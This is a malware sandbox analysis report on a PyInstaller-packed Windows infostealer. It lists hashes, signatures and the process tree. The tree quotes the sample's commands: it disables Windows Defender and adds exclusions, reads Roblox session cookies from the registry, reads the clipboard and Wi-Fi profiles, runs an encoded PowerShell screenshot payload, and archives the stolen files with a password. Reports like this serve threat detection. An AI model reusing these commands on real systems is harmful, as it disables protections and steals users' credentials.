Analysis

  • max time kernel
    148s
  • max time network
    276s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-06-2024 21:27

General

  • Target

    v5 yssmrn_/v55.exe

  • Size

    12.3MB

  • MD5

    3db8c1ee14aa746c099481bdb31d36c5

  • SHA1

    ae94f11a184b2e55f1612f9b9901378fcd65e505

  • SHA256

    c932c8185582e062ff5c2bee4ac8fe390539325d0a432c91dba5a617cc8e9ebc

  • SHA512

    28de48ae12776662a0e458754cf3be00d9b31528ae66af30ea187959ee068cbe62693d9fa7c23309fdc15487d1e25801e05f37b561a0038f61988ab22a20fdcc

  • SSDEEP

    393216:ByKRk9incp/qc8zCInj0WkJbMUWWlQ845bzS:BpR/nc8c8zCYYJwDb

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\v5 yssmrn_\v55.exe
    "C:\Users\Admin\AppData\Local\Temp\v5 yssmrn_\v55.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1528
    • C:\Users\Admin\AppData\Local\Temp\Built.exe
      "C:\Users\Admin\AppData\Local\Temp\Built.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1240
      • C:\Users\Admin\AppData\Local\Temp\Built.exe
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2444
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4512
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4744
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4980
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4460
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4032
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3332
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2272
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2372
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2380
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
            5⤵
              PID:2828
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:540
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              5⤵
                PID:2416
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2240
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                5⤵
                • Detects videocard installed
                • Suspicious use of AdjustPrivilegeToken
                PID:1324
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4544
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic path win32_VideoController get name
                5⤵
                • Detects videocard installed
                PID:4564
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​    .scr'"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2036
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​    .scr'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:2688
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:4484
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                5⤵
                • Enumerates processes with tasklist
                PID:3044
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1256
              • C:\Windows\system32\tasklist.exe
                tasklist /FO LIST
                5⤵
                • Enumerates processes with tasklist
                PID:2964
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              4⤵
                PID:3644
                • C:\Windows\System32\Wbem\WMIC.exe
                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                  5⤵
                    PID:3628
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                  4⤵
                    PID:4988
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Get-Clipboard
                      5⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1404
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                    4⤵
                      PID:432
                      • C:\Windows\system32\tasklist.exe
                        tasklist /FO LIST
                        5⤵
                        • Enumerates processes with tasklist
                        PID:2416
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      4⤵
                        PID:4060
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          5⤵
                            PID:1512
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                          4⤵
                            PID:4792
                            • C:\Windows\system32\netsh.exe
                              netsh wlan show profile
                              5⤵
                                PID:3584
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "systeminfo"
                              4⤵
                                PID:4540
                                • C:\Windows\system32\systeminfo.exe
                                  systeminfo
                                  5⤵
                                  • Gathers system information
                                  PID:3192
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                4⤵
                                  PID:3064
                                  • C:\Windows\system32\reg.exe
                                    REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                    5⤵
                                      PID:4440
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                    4⤵
                                      PID:2396
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4904
                                        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l0guzk01\l0guzk01.cmdline"
                                          6⤵
                                            PID:4280
                                            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50A0.tmp" "c:\Users\Admin\AppData\Local\Temp\l0guzk01\CSCD89D273246DB42EB8F3464DE88C2A475.TMP"
                                              7⤵
                                                PID:3780
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          4⤵
                                            PID:3660
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              5⤵
                                                PID:2688
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                              4⤵
                                                PID:4088
                                                • C:\Windows\system32\attrib.exe
                                                  attrib -r C:\Windows\System32\drivers\etc\hosts
                                                  5⤵
                                                  • Drops file in Drivers directory
                                                  • Views/modifies file attributes
                                                  PID:1896
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                4⤵
                                                  PID:628
                                                  • C:\Windows\system32\tree.com
                                                    tree /A /F
                                                    5⤵
                                                      PID:1836
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                    4⤵
                                                      PID:1220
                                                      • C:\Windows\system32\attrib.exe
                                                        attrib +r C:\Windows\System32\drivers\etc\hosts
                                                        5⤵
                                                        • Drops file in Drivers directory
                                                        • Views/modifies file attributes
                                                        PID:1060
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                      4⤵
                                                        PID:2972
                                                        • C:\Windows\system32\tree.com
                                                          tree /A /F
                                                          5⤵
                                                            PID:2036
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                          4⤵
                                                            PID:3504
                                                            • C:\Windows\system32\tasklist.exe
                                                              tasklist /FO LIST
                                                              5⤵
                                                              • Enumerates processes with tasklist
                                                              PID:4064
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            4⤵
                                                              PID:2664
                                                              • C:\Windows\system32\tree.com
                                                                tree /A /F
                                                                5⤵
                                                                  PID:3228
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                4⤵
                                                                  PID:60
                                                                  • C:\Windows\system32\tree.com
                                                                    tree /A /F
                                                                    5⤵
                                                                      PID:3812
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                    4⤵
                                                                      PID:1336
                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                        5⤵
                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                        PID:2372
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                      4⤵
                                                                        PID:4916
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                          5⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:4456
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "getmac"
                                                                        4⤵
                                                                          PID:3032
                                                                          • C:\Windows\system32\getmac.exe
                                                                            getmac
                                                                            5⤵
                                                                              PID:4728
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI12402\rar.exe a -r -hp"blaank" "C:\Users\Admin\AppData\Local\Temp\sV37s.zip" *"
                                                                            4⤵
                                                                              PID:4868
                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI12402\rar.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\_MEI12402\rar.exe a -r -hp"blaank" "C:\Users\Admin\AppData\Local\Temp\sV37s.zip" *
                                                                                5⤵
                                                                                • Executes dropped EXE
                                                                                PID:212
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                              4⤵
                                                                                PID:3080
                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                  wmic os get Caption
                                                                                  5⤵
                                                                                    PID:2732
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                  4⤵
                                                                                    PID:2968
                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                      wmic computersystem get totalphysicalmemory
                                                                                      5⤵
                                                                                        PID:2060
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                      4⤵
                                                                                        PID:2380
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic csproduct get uuid
                                                                                          5⤵
                                                                                            PID:1856
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                          4⤵
                                                                                            PID:3856
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
